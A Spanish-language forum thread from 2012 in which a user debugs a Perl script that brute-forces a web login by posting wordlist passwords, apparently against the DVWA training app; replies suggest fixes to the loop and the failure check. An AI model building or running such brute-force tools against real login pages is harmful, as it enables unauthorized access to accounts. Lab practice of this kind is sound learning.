elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  ayuda con un intento de bruteforce en PERL
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ayuda con un intento de bruteforce en PERL  (Leído 3,485 veces)
Belial & Grimoire


Desconectado Desconectado

Mensajes: 559


Tea_Madhatter


Ver Perfil
ayuda con un intento de bruteforce en PERL
« en: 3 Septiembre 2012, 03:04 am »

hola

estaba tratando de hacer un bruteforce sencillo pero no logro hacer que funcione bien, ya que busca en un diccionario las palabras pero cuando pasa la correcta no se detiene

espero me puedan ayudar porfavor

Este es el codigo perl

Código
  1. use LWP::UserAgent;
  2. use HTTP::Request::Common;
  3.  
  4. my $target = $ARGV[0];
  5. my $user = $ARGV[1];
  6. my $file = $ARGV[2];
  7. my $bot = $ARGV[3];
  8.  
  9. unless ($target || $user || $file){
  10. print("modo de uso = brute.pl <target> <user> <wordlist>");
  11. exit 1;
  12. }
  13.  
  14. if(! -f $file){
  15. print("\n\n -Archivo inexistente o invalido");
  16. exit 1;
  17. }else{
  18.  
  19. open (WORDLIST, $file);
  20. @word = <WORDLIST>;
  21. close WORDLIST;
  22.  
  23. print("inicio de bruteforce");
  24. $i = 0;
  25.  
  26. foreach $words(@word){
  27. chomp $words;
  28. print "- Intentando con pass = $words\n";
  29. $lwp = LWP::UserAgent->new();
  30. $lwp->agent("Mozilla/5.0 (X11; Linux i686; rv:15.0) Gecko/20100101 Firefox/15.0");
  31. $request = $lwp->post($target, ["username" => $user, "password"=>$words, "submit"=>$bot]);
  32. $fondo = $request->content;
  33.  
  34. if($fondo =~ m/Login failed/i){
  35. chomp $words;
  36. print "\n\n[Usuario] $user\n";
  37. print "[Pass] $word\n";
  38. print "intentos $i\n";
  39. }else{
  40. $i++;
  41. }
  42.  
  43.  
  44. }
  45. }
  46.  


Y este es el codigo php con el que intento que funcione, no se si lo que hago es bueno, o habra otra forma de hacer un bruteforce mas universal

Código
  1. <form action="login.php" method="post">
  2.  
  3. <fieldset>
  4.  
  5. <label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />
  6.  
  7. <label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />
  8.  
  9. <p class="submit"><input type="submit" value="Login" name="Login"></p>
  10. </fieldset>
  11. </form>

salu2



En línea

.                                 
explorer

Desconectado Desconectado

Mensajes: 101


Analista/Programador Perl


Ver Perfil
Re: ayuda con un intento de bruteforce en PERL
« Respuesta #1 en: 3 Septiembre 2012, 11:37 am »

Después del $i++; pon un

last;


En línea

Belial & Grimoire


Desconectado Desconectado

Mensajes: 559


Tea_Madhatter


Ver Perfil
Re: ayuda con un intento de bruteforce en PERL
« Respuesta #2 en: 3 Septiembre 2012, 17:38 pm »

hola

gracias por la respuesta, pero sigue sin funcionar jeje, hice un cambio pero no logro hacerlo funcionar bien, creo el error esta en el ultimo "if" sino entonces no se me ocurre donde mas


Código
  1. #!/usr/bin/perl -w
  2.  
  3. use LWP::UserAgent;
  4. use HTTP::Request::Common;
  5.  
  6. my $target = $ARGV[0];
  7. my $user = $ARGV[1];
  8. my $file = $ARGV[2];
  9. my $bot = $ARGV[3];
  10.  
  11. unless ($target || $user || $file){
  12. print("modo de uso = brute.pl <target> <user> <wordlist><submit>");
  13. exit 1;
  14. }
  15.  
  16. if(! -f $file){
  17. print("\n\n -Archivo inexistente o invalido");
  18. exit 1;
  19. }else{
  20.  
  21. open (WORDLIST, $file);
  22. @word = <WORDLIST>;
  23. close WORDLIST;
  24.  
  25. print("inicio de bruteforce\n");
  26. $i = 0;
  27.  
  28. foreach $words(@word){
  29. chomp $words;
  30. print "\n- Intentando con pass = $words\n";
  31. $lwp = LWP::UserAgent->new();
  32. $lwp->agent("Mozilla/5.0 (X11; Linux i686; rv:15.0) Gecko/20100101 Firefox/15.0");
  33. $request = $lwp->post($target, ["username" => $user, "password"=>$words, "submit"=>$bot]);
  34. $fondo = $request->content;
  35.  
  36. if($fondo ne "Login failed"){
  37. chomp $words;
  38. print "[Usuario] $user\n";
  39. print "[Pass] $words\n";
  40. print "intentos $i\n";
  41. }else{
  42. $i++;
  43. last;
  44. }
  45. }
  46. }

Código:
- Intentando con pass = pa
[Usuario] admin
[Pass] pa
intentos 0

- Intentando con pass = pto
[Usuario] admin
[Pass] pto
intentos 0

- Intentando con pass = password
[Usuario] admin
[Pass] passo
intentos 0

- Intentando con pass = passo
[Usuario] admin
[Pass] passo
intentos 0

supuestamente se deberia detener en el tercero 'password' pero continua
« Última modificación: 3 Septiembre 2012, 17:41 pm por Belial & Grimoire » En línea

.                                 
RevangelyonX

Desconectado Desconectado

Mensajes: 245


Ver Perfil WWW
Re: ayuda con un intento de bruteforce en PERL
« Respuesta #3 en: 4 Septiembre 2012, 14:02 pm »

Hola
Puedes hacer un print de $fondo dentro del bucle?
Gracias
En línea

Just Linux
OSCP certified
explorer

Desconectado Desconectado

Mensajes: 101


Analista/Programador Perl


Ver Perfil
Re: ayuda con un intento de bruteforce en PERL
« Respuesta #4 en: 4 Septiembre 2012, 21:55 pm »

¡Ah!, quizás el problema sea

if($fondo ne "Login failed"){


Es casi seguro que $fondo contengo algo más que "Login failed".

Quizás con una expresión regular...

Código
  1. if ($fondo !~  /Login failed/) {

Otro detalle: mueve el $i++ a la primera parte del if(), no al else{}.
En línea

Belial & Grimoire


Desconectado Desconectado

Mensajes: 559


Tea_Madhatter


Ver Perfil
Re: ayuda con un intento de bruteforce en PERL
« Respuesta #5 en: 5 Septiembre 2012, 04:34 am »

hola

jeje bueno almenos los intentos si funcionaron, tenia que poner $i++ antes de else

pero sigo sin conseguir acceso, ya puse un print y esto me aparecio

Código
  1. - Intentando con pass = nano
  2.  
  3.  
  4. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  5.  
  6. <html xmlns="http://www.w3.org/1999/xhtml">
  7.  
  8. <head>
  9.  
  10. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
  11.  
  12. <title>Damn Vulnerable Web App (DVWA) - Login</title>
  13.  
  14. <link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />
  15.  
  16. </head>
  17.  
  18. <body>
  19.  
  20. <div align="center">
  21.  
  22. <br />
  23.  
  24. <p><img src="dvwa/images/login_logo.png" /></p>
  25.  
  26. <br />
  27.  
  28. <form action="login.php" method="post">
  29.  
  30. <fieldset>
  31.  
  32. <label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />
  33.  
  34.  
  35. <label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />
  36.  
  37.  
  38. <p class="submit"><input type="submit" value="Login" name="Login"></p>
  39.  
  40. </fieldset>
  41.  
  42. </form>
  43.  
  44.  
  45. <br />
  46.  
  47.  
  48.  
  49. <br />
  50. <br />
  51. <br />
  52. <br />
  53. <br />
  54. <br />
  55. <br />
  56. <br />
  57.  
  58. <!-- <img src="dvwa/images/RandomStorm.png" /> -->
  59.  
  60. <p>Damn Vulnerable Web Application (DVWA) is a RandomStorm OpenSource project</p>
  61.  
  62. </div> <!-- end align div -->
  63.  
  64. </body>
  65.  
  66. </html>
  67. [Usuario] admin
  68. [Pass] nano
  69. intentos 6
  70.  
  71.  

en el php cuando pongo un codigo erroneo, me aparece Login failed, pero no se que mas podria hacer mal
En línea

.                                 
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
necesito ayuda con un webproxy que intento hacer
PHP
Belial & Grimoire 1 2,337 Último mensaje 10 Enero 2012, 18:53 pm
por #!drvy
No consigo handshake por mas que lo intento ayuda!! « 1 2 »
Hacking Wireless
quillolg 10 14,279 Último mensaje 30 Abril 2013, 18:16 pm
por jemez44
Ayuda , Bruteforce hash Nokia 303
Dispositivos Móviles (PDA's, Smartphones, Tablets)
realunlocker 0 2,176 Último mensaje 4 Septiembre 2013, 17:26 pm
por realunlocker
Ayuda ; Bruteforce hash Nokia 303 !!!
Hacking
realunlocker 0 2,346 Último mensaje 12 Septiembre 2013, 16:27 pm
por realunlocker
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines